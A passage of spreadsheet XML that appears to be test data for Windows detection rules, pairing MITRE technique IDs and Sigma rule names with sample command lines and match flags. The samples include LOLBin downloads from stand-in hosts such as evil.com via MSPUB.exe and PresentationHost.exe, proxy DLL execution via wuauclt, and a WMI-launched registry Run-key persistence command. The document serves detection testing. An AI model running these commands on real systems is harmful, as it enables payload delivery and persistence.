      <c r="I4667" s="44" t="n"/>
      <c r="J4667" s="44" t="n"/>
      <c r="K4667" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4668" ht="15.75" customHeight="1" s="42">
      <c r="A4668" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4668" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mspub_download</t>
        </is>
      </c>
      <c r="C4668" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSPUB.EXE</t>
        </is>
      </c>
      <c r="D4668" s="44" t="inlineStr">
        <is>
          <t>3b3c7f55-f771-4dd6-8a6e-08d057a17caf</t>
        </is>
      </c>
      <c r="E4668" s="44" t="inlineStr">
        <is>
          <t>MSPUB.exe HttPs://evil.com/payload.pub</t>
        </is>
      </c>
      <c r="F4668" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4668" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4668" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4668" s="44" t="n"/>
      <c r="J4668" s="44" t="n"/>
      <c r="K4668" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4669" ht="15.75" customHeight="1" s="42">
      <c r="A4669" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4669" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mspub_download</t>
        </is>
      </c>
      <c r="C4669" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSPUB.EXE</t>
        </is>
      </c>
      <c r="D4669" s="44" t="inlineStr">
        <is>
          <t>3b3c7f55-f771-4dd6-8a6e-08d057a17caf</t>
        </is>
      </c>
      <c r="E4669" s="44" t="inlineStr">
        <is>
          <t>MSPUB.exe "https://evil.com/payload.pub"</t>
        </is>
      </c>
      <c r="F4669" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4669" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4669" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4669" s="44" t="n"/>
      <c r="J4669" s="44" t="n"/>
      <c r="K4669" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4670" ht="15.75" customHeight="1" s="42">
      <c r="A4670" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4670" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C4670" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D4670" s="44" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E4670" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\PresentationHost.exe "https://example.com/malicious.xbap"</t>
        </is>
      </c>
      <c r="F4670" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4670" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4670" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4670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4670" s="44" t="n"/>
      <c r="K4670" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4671" ht="15.75" customHeight="1" s="42">
      <c r="A4671" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4671" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C4671" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D4671" s="44" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E4671" s="44" t="inlineStr">
        <is>
          <t>PresentationHost.exe -http https://example.com/malicious.xbap</t>
        </is>
      </c>
      <c r="F4671" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4671" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4671" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4671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4671" s="44" t="n"/>
      <c r="K4671" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4672" ht="15.75" customHeight="1" s="42">
      <c r="A4672" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4672" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C4672" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D4672" s="44" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E4672" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\PresentationHost.exe ftp://example.com/malicious.xbap</t>
        </is>
      </c>
      <c r="F4672" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4672" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4672" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4672" s="44" t="n"/>
      <c r="J4672" s="44" t="n"/>
      <c r="K4672" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4673" ht="15.75" customHeight="1" s="42">
      <c r="A4673" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4673" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C4673" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D4673" s="44" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E4673" s="44" t="inlineStr">
        <is>
          <t>PresentationHost.exe https://example.com/malicious.xbap</t>
        </is>
      </c>
      <c r="F4673" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4673" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4673" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4673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4673" s="44" t="n"/>
      <c r="K4673" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4674" ht="15.75" customHeight="1" s="42">
      <c r="A4674" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4674" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C4674" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D4674" s="44" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E4674" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\PresentationHost.exe https://example.com/malicious.xbap</t>
        </is>
      </c>
      <c r="F4674" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4674" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4674" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4674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4674" s="44" t="n"/>
      <c r="K4674" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4675" ht="15.75" customHeight="1" s="42">
      <c r="A4675" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4675" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C4675" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D4675" s="44" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E4675" s="44" t="inlineStr">
        <is>
          <t>PresentationHost.exe $("https://example.com/malicious.xbap")</t>
        </is>
      </c>
      <c r="F4675" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4675" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4675" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4675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4675" s="44" t="n"/>
      <c r="K4675" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4676" ht="15.75" customHeight="1" s="42">
      <c r="A4676" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4676" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_uncommon_location_exec</t>
        </is>
      </c>
      <c r="C4676" s="44" t="inlineStr">
        <is>
          <t>XBAP Execution From Uncommon Locations Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D4676" s="44" t="inlineStr">
        <is>
          <t>d22e2925-cfd8-463f-96f6-89cec9d9bc5f</t>
        </is>
      </c>
      <c r="E4676" s="44" t="inlineStr">
        <is>
          <t>"C:\\Program Files\\Internet Explorer\\PresentationHost.exe" ".xbap"</t>
        </is>
      </c>
      <c r="F4676" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4676" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4676" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4676" s="44" t="n"/>
      <c r="J4676" s="44" t="n"/>
      <c r="K4676" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4677" ht="15.75" customHeight="1" s="42">
      <c r="A4677" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4677" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_uncommon_location_exec</t>
        </is>
      </c>
      <c r="C4677" s="44" t="inlineStr">
        <is>
          <t>XBAP Execution From Uncommon Locations Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D4677" s="44" t="inlineStr">
        <is>
          <t>d22e2925-cfd8-463f-96f6-89cec9d9bc5f</t>
        </is>
      </c>
      <c r="E4677" s="44" t="inlineStr">
        <is>
          <t>PresentationHost.exe -- .xbap</t>
        </is>
      </c>
      <c r="F4677" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4677" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4677" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4677" s="44" t="inlineStr">
        <is>
          <t>XBAP Execution From Uncommon Locations Via PresentationHost.EXE (d22e2925-cfd8-463f-96f6-89cec9d9bc5f)</t>
        </is>
      </c>
      <c r="J4677" s="44" t="n"/>
      <c r="K4677" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4678" ht="15.75" customHeight="1" s="42">
      <c r="A4678" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4678" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_uncommon_location_exec</t>
        </is>
      </c>
      <c r="C4678" s="44" t="inlineStr">
        <is>
          <t>XBAP Execution From Uncommon Locations Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D4678" s="44" t="inlineStr">
        <is>
          <t>d22e2925-cfd8-463f-96f6-89cec9d9bc5f</t>
        </is>
      </c>
      <c r="E4678" s="44" t="inlineStr">
        <is>
          <t>PresentationHost .xbap</t>
        </is>
      </c>
      <c r="F4678" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4678" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4678" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4678" s="44" t="inlineStr">
        <is>
          <t>XBAP Execution From Uncommon Locations Via PresentationHost.EXE (d22e2925-cfd8-463f-96f6-89cec9d9bc5f)</t>
        </is>
      </c>
      <c r="J4678" s="44" t="n"/>
      <c r="K4678" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4679" ht="15.75" customHeight="1" s="42">
      <c r="A4679" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4679" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_uncommon_location_exec</t>
        </is>
      </c>
      <c r="C4679" s="44" t="inlineStr">
        <is>
          <t>XBAP Execution From Uncommon Locations Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D4679" s="44" t="inlineStr">
        <is>
          <t>d22e2925-cfd8-463f-96f6-89cec9d9bc5f</t>
        </is>
      </c>
      <c r="E4679" s="44" t="inlineStr">
        <is>
          <t>.xbap PresentationHost.exe</t>
        </is>
      </c>
      <c r="F4679" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4679" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4679" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4679" s="44" t="n"/>
      <c r="J4679" s="44" t="n"/>
      <c r="K4679" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4680" ht="15.75" customHeight="1" s="42">
      <c r="A4680" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4680" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_uncommon_location_exec</t>
        </is>
      </c>
      <c r="C4680" s="44" t="inlineStr">
        <is>
          <t>XBAP Execution From Uncommon Locations Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D4680" s="44" t="inlineStr">
        <is>
          <t>d22e2925-cfd8-463f-96f6-89cec9d9bc5f</t>
        </is>
      </c>
      <c r="E4680" s="44" t="inlineStr">
        <is>
          <t>%COMSPEC% /c PresentationHost.exe .xbap</t>
        </is>
      </c>
      <c r="F4680" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4680" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4680" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4680" s="44" t="inlineStr">
        <is>
          <t>XBAP Execution From Uncommon Locations Via PresentationHost.EXE (d22e2925-cfd8-463f-96f6-89cec9d9bc5f)</t>
        </is>
      </c>
      <c r="J4680" s="44" t="n"/>
      <c r="K4680" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4681" ht="15.75" customHeight="1" s="42">
      <c r="A4681" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4681" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_squirrel_download</t>
        </is>
      </c>
      <c r="C4681" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via Squirrel.EXE</t>
        </is>
      </c>
      <c r="D4681" s="44" t="inlineStr">
        <is>
          <t>1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c</t>
        </is>
      </c>
      <c r="E4681" s="44" t="inlineStr">
        <is>
          <t>Update.exe "--download" http://example.com/payload.txt</t>
        </is>
      </c>
      <c r="F4681" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4681" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4681" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4681" s="44" t="n"/>
      <c r="J4681" s="44" t="n"/>
      <c r="K4681" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4682" ht="15.75" customHeight="1" s="42">
      <c r="A4682" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4682" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_squirrel_proxy_execution</t>
        </is>
      </c>
      <c r="C4682" s="44" t="inlineStr">
        <is>
          <t>Process Proxy Execution Via Squirrel.EXE</t>
        </is>
      </c>
      <c r="D4682" s="44" t="inlineStr">
        <is>
          <t>45239e6a-b035-4aaf-b339-8ad379fcb67e</t>
        </is>
      </c>
      <c r="E4682" s="44" t="inlineStr">
        <is>
          <t>Update.exe --PROCESSSTART calc.exe</t>
        </is>
      </c>
      <c r="F4682" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4682" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4682" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4682" s="44" t="n"/>
      <c r="J4682" s="44" t="n"/>
      <c r="K4682" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4683" ht="15.75" customHeight="1" s="42">
      <c r="A4683" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4683" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ms_appinstaller_download</t>
        </is>
      </c>
      <c r="C4683" s="44" t="inlineStr">
        <is>
          <t>Potential File Download Via MS-AppInstaller Protocol Handler</t>
        </is>
      </c>
      <c r="D4683" s="44" t="inlineStr">
        <is>
          <t>180c7c5c-d64b-4a63-86e9-68910451bc8b</t>
        </is>
      </c>
      <c r="E4683" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "start ms-appinstaller://?source^=http://example.com/package.appinstaller"</t>
        </is>
      </c>
      <c r="F4683" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4683" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4683" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4683" s="44" t="n"/>
      <c r="J4683" s="44" t="n"/>
      <c r="K4683" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4684" ht="15.75" customHeight="1" s="42">
      <c r="A4684" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4684" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ms_appinstaller_download</t>
        </is>
      </c>
      <c r="C4684" s="44" t="inlineStr">
        <is>
          <t>Potential File Download Via MS-AppInstaller Protocol Handler</t>
        </is>
      </c>
      <c r="D4684" s="44" t="inlineStr">
        <is>
          <t>180c7c5c-d64b-4a63-86e9-68910451bc8b</t>
        </is>
      </c>
      <c r="E4684" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set PROTOCOL=ms-appinstaller://?source=&amp;&amp; call start %PROTOCOL%http://example.com/package.appinstaller"</t>
        </is>
      </c>
      <c r="F4684" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4684" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4684" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4684" s="44" t="inlineStr">
        <is>
          <t>Potential File Download Via MS-AppInstaller Protocol Handler (180c7c5c-d64b-4a63-86e9-68910451bc8b)</t>
        </is>
      </c>
      <c r="J4684" s="44" t="n"/>
      <c r="K4684" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4685" ht="15.75" customHeight="1" s="42">
      <c r="A4685" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4685" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C4685" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D4685" s="44" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E4685" s="44" t="inlineStr">
        <is>
          <t>wuauclt.exe /UpdateDeploymentProvider "C:\AtomicRedTeam\atomics\T1218\bin\calc.dll" "/RunHandlerComServer"</t>
        </is>
      </c>
      <c r="F4685" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4685" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4685" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4685" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE (af77cf95-c469-471c-b6a0-946c685c4798)</t>
        </is>
      </c>
      <c r="J4685" s="44" t="n"/>
      <c r="K4685" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4686" ht="15.75" customHeight="1" s="42">
      <c r="A4686" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4686" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C4686" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D4686" s="44" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E4686" s="44" t="inlineStr">
        <is>
          <t>wuauclt.exe -UpdateDeploymentProvider "C:\AtomicRedTeam\atomics\T1218\bin\calc.dll" -RunHandlerComServer</t>
        </is>
      </c>
      <c r="F4686" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4686" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4686" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4686" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE (af77cf95-c469-471c-b6a0-946c685c4798)</t>
        </is>
      </c>
      <c r="J4686" s="44" t="n"/>
      <c r="K4686" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4687" ht="15.75" customHeight="1" s="42">
      <c r="A4687" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4687" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C4687" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D4687" s="44" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E4687" s="44" t="inlineStr">
        <is>
          <t>wuauclt.exe /RunHandlerComServer /UpdateDeploymentProvider "C:\AtomicRedTeam\atomics\T1218\bin\calc.dll"</t>
        </is>
      </c>
      <c r="F4687" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4687" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4687" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4687" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE (af77cf95-c469-471c-b6a0-946c685c4798)</t>
        </is>
      </c>
      <c r="J4687" s="44" t="n"/>
      <c r="K4687" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4688" ht="15.75" customHeight="1" s="42">
      <c r="A4688" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4688" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C4688" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D4688" s="44" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E4688" s="44" t="inlineStr">
        <is>
          <t>wuauclt.exe /UpdateDeploymentProvider "C:\AtomicRedTeam\atomics\T1218\bin\calc.dll" /RunHandlerComServer wuaueng.dll</t>
        </is>
      </c>
      <c r="F4688" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4688" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4688" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4688" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE (af77cf95-c469-471c-b6a0-946c685c4798)</t>
        </is>
      </c>
      <c r="J4688" s="44" t="n"/>
      <c r="K4688" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4689" ht="15.75" customHeight="1" s="42">
      <c r="A4689" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B4689" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_autorun_registry_modified_via_wmic</t>
        </is>
      </c>
      <c r="C4689" s="44" t="inlineStr">
        <is>
          <t>Suspicious Autorun Registry Modified via WMI</t>
        </is>
      </c>
      <c r="D4689" s="44" t="inlineStr">
        <is>
          <t>c80e66d8-1780-48a9-b412-46663fd21ac0</t>
        </is>
      </c>
      <c r="E4689" s="44" t="inlineStr">
        <is>
          <t>powershell.exe Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\\Run" /v Updater /t REG_SZ /d "C:\Windows\Temp\malware.exe" /f'</t>
        </is>
      </c>
      <c r="F4689" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4689" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4689" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4689" s="44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4689" s="44" t="n"/>
      <c r="K4689" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4690" ht="15.75" customHeight="1" s="42">
      <c r="A4690" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B4690" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_autorun_registry_modified_via_wmic</t>
        </is>
      </c>
      <c r="C4690" s="44" t="inlineStr">
        <is>
          <t>Suspicious Autorun Registry Modified via WMI</t>
        </is>
      </c>
      <c r="D4690" s="44" t="inlineStr">
        <is>
          <t>c80e66d8-1780-48a9-b412-46663fd21ac0</t>
        </is>
      </c>
      <c r="E4690" s="44" t="inlineStr">
        <is>
          <t>powershell.exe Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'reg.exe "add" HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Windows\Temp\malware.exe" /f'</t>
        </is>
      </c>
      <c r="F4690" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4690" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4690" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4690" s="44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4690" s="44" t="n"/>
      <c r="K4690" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4691" ht="15.75" customHeight="1" s="42">
      <c r="A4691" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B4691" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_autorun_registry_modified_via_wmic</t>
        </is>
      </c>
      <c r="C4691" s="44" t="inlineStr">
        <is>
          <t>Suspicious Autorun Registry Modified via WMI</t>
        </is>
      </c>
      <c r="D4691" s="44" t="inlineStr">
        <is>
          <t>c80e66d8-1780-48a9-b412-46663fd21ac0</t>
        </is>
      </c>
      <c r="E4691" s="44" t="inlineStr">
        <is>
          <t>powershell.exe Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Windows\.\Temp\malware.exe" /f'</t>
        </is>
      </c>
      <c r="F4691" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4691" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4691" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4691" s="44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4691" s="44" t="n"/>
      <c r="K4691" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4692" ht="15.75" customHeight="1" s="42">
      <c r="A4692" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B4692" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_autorun_registry_modified_via_wmic</t>
        </is>
      </c>
      <c r="C4692" s="44" t="inlineStr">
        <is>
          <t>Suspicious Autorun Registry Modified via WMI</t>
        </is>
      </c>
      <c r="D4692" s="44" t="inlineStr">
        <is>
          <t>c80e66d8-1780-48a9-b412-46663fd21ac0</t>
        </is>
      </c>
      <c r="E4692" s="44" t="inlineStr">
        <is>
          <t>powershell.exe Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:/Windows/Temp/malware.exe" /f'</t>
        </is>
      </c>
      <c r="F4692" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4692" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4692" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4692" s="44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4692" s="44" t="n"/>
      <c r="K4692" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4693" ht="15.75" customHeight="1" s="42">
      <c r="A4693" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B4693" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_bcp_export_data</t>
        </is>
      </c>
      <c r="C4693" s="44" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE</t>
        </is>
      </c>
      <c r="D4693" s="44" t="inlineStr">
        <is>
          <t>c615d676-f655-46b9-b913-78729021e5d7</t>
        </is>
      </c>
      <c r="E4693" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Tools\bcp.exe TestDB.dbo.TestTable o^ut C:\Temp\test.txt -c -T</t>
        </is>
      </c>
      <c r="F4693" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4693" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4693" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4693" s="44" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE (c615d676-f655-46b9-b913-78729021e5d7)</t>
        </is>
      </c>
      <c r="J4693" s="44" t="n"/>
      <c r="K4693" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4694" ht="15.75" customHeight="1" s="42">
      <c r="A4694" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B4694" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cdb_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C4694" s="44" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via Cdb.EXE</t>
        </is>
      </c>
      <c r="D4694" s="44" t="inlineStr">
        <is>
          <t>b5c7395f-e501-4a08-94d4-57fe7a9da9d2</t>
        </is>
      </c>
